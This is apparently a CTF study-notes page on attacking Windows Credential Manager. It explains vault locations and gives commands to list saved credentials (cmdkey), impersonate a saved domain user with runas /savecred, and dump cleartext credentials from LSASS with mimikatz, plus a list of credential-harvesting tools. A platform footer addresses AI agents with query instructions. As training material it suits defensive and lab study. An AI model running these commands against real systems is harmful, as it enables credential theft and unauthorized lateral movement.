> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-authentication-process/attacking-windows-credential-manager.md).

# Attacking Windows Credential Manager

### What is Credential Manager?

**Credential Manager** is a built-in Windows feature (since Server 2008 R2 / Windows 7) that allows users and applications to securely store credentials for other systems and websites. It is the user-facing API; the actual encrypted stores are called **Credential Lockers** (formerly Windows Vaults).

#### Two types of stored credentials:

| Type                    | Description                                                                              |
| ----------------------- | ---------------------------------------------------------------------------------------- |
| **Web Credentials**     | Credentials for websites and online accounts. Used by Internet Explorer and legacy Edge. |
| **Windows Credentials** | Login tokens for services (OneDrive, domain users, network shares, SMB, etc.)            |

***

### Where Credentials Are Stored on Disk

```
%UserProfile%\AppData\Local\Microsoft\Vault\
%UserProfile%\AppData\Local\Microsoft\Credentials\
%UserProfile%\AppData\Roaming\Microsoft\Vault\
%ProgramData%\Microsoft\Vault\
%SystemRoot%\System32\config\systemprofile\AppData\Roaming\Microsoft\Vault\
```

Each vault folder contains a `Policy.vpol` file holding **AES-128 or AES-256 keys** protected by **DPAPI**. These AES keys encrypt the credentials.

> **Note:** Newer Windows versions use **Credential Guard** to further protect DPAPI master keys inside Virtualization-based Security (VBS) memory enclaves.

***

### Enumerating Stored Credentials

#### cmdkey (built-in, no tools needed)

```cmd
cmdkey /list
```

**Example output:**

```
Currently stored credentials:

    Target: WindowsLive:target=virtualapp/didlogical
    Type: Generic
    User: 02hejubrtyqjrkfi
    Local machine persistence

    Target: Domain:interactive=SRV01\mcharles
    Type: Domain Password
    User: SRV01\mcharles
```

#### Reading the output:

| Field           | Meaning                                                                    |
| --------------- | -------------------------------------------------------------------------- |
| **Target**      | The resource/account this credential is for (hostname, domain, special ID) |
| **Type**        | `Generic` = general use, `Domain Password` = domain logon credential       |
| **User**        | Account associated with the credential                                     |
| **Persistence** | `Local machine persistence` = survives reboots                             |

> **Ignore:** `virtualapp/didlogical` is an internal Microsoft account/Windows Live ID — not useful for attacks.

> **Focus on:** `Domain:interactive=SRV01\mcharles` — a domain credential saved for interactive logon. This is actionable.

***

### Abusing Stored Credentials — runas /savecred

If you find a `Domain:interactive` credential via `cmdkey`, you can impersonate that user **without knowing their password**:

```cmd
runas /savecred /user:SRV01\mcharles cmd
```

* Opens a new `cmd.exe` session running as `mcharles`
* Uses the saved credential silently — no password prompt
* Verify with `whoami` in the new shell

> This is essentially free lateral movement if a privileged user has their credentials stored on a machine you've compromised.

***

### Exporting the Vault (for Reference)

```cmd
rundll32 keymgr.dll,KRShowKeyMgr
```

Opens the **Stored User Names and Passwords** GUI. Vaults can be exported to `.crd` files (encrypted with a user-supplied password) and imported on other Windows systems.

***

### Extracting Credentials with Mimikatz

Mimikatz can attack Credential Manager credentials in two ways:

| Approach                   | Mimikatz Module | How                                              |
| -------------------------- | --------------- | ------------------------------------------------ |
| Dump from LSASS memory     | `sekurlsa`      | Reads creds cached in the LSASS process          |
| Manually decrypt from disk | `dpapi`         | Uses extracted DPAPI keys to decrypt vault files |

#### Method — sekurlsa::credman

```
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::credman
```

**Example output:**

```
User Name : mcharles
Domain    : SRV01
        credman :
         [00000000]
         * Username : mcharles@inlanefreight.local
         * Domain   : onedrive.live.com
         * Password : <CLEARTEXT>
```

`sekurlsa::credman` reads Credential Manager entries directly from LSASS memory — bypassing the on-disk encryption entirely. If the user has an active session, cleartext credentials may be present.

***

### Other Tools

| Tool           | Notes                                                                         |
| -------------- | ----------------------------------------------------------------------------- |
| **SharpDPAPI** | .NET tool for DPAPI decryption; can target vault files directly               |
| **LaZagne**    | Multi-platform credential harvester; covers browsers, Windows creds, and more |
| **DonPAPI**    | Remote DPAPI decryption; useful for lateral movement without touching disk    |

***

### Key points

* **cmdkey /list** is always your first step — zero tools required, built-in to Windows.
* **runas /savecred** is the fast win: if a domain admin's credential is saved, you get their shell for free.
* **Credential Manager uses DPAPI** for encryption — this is why DPAPI masterkeys extracted from LSASS are so valuable. One masterkey can decrypt the entire vault.
* **sekurlsa::credman vs dpapi module:** `sekurlsa` reads from live LSASS memory (requires active session); `dpapi` decrypts from disk files (requires masterkey). Both end up at the same place.
* **Credential Guard** is the modern defense — if enabled, DPAPI masterkeys are in a VBS enclave and cannot be extracted from LSASS even as SYSTEM. Worth noting during reporting.
* `virtualapp/didlogical` appearing in cmdkey output = noise, skip it.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-authentication-process/attacking-windows-credential-manager.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
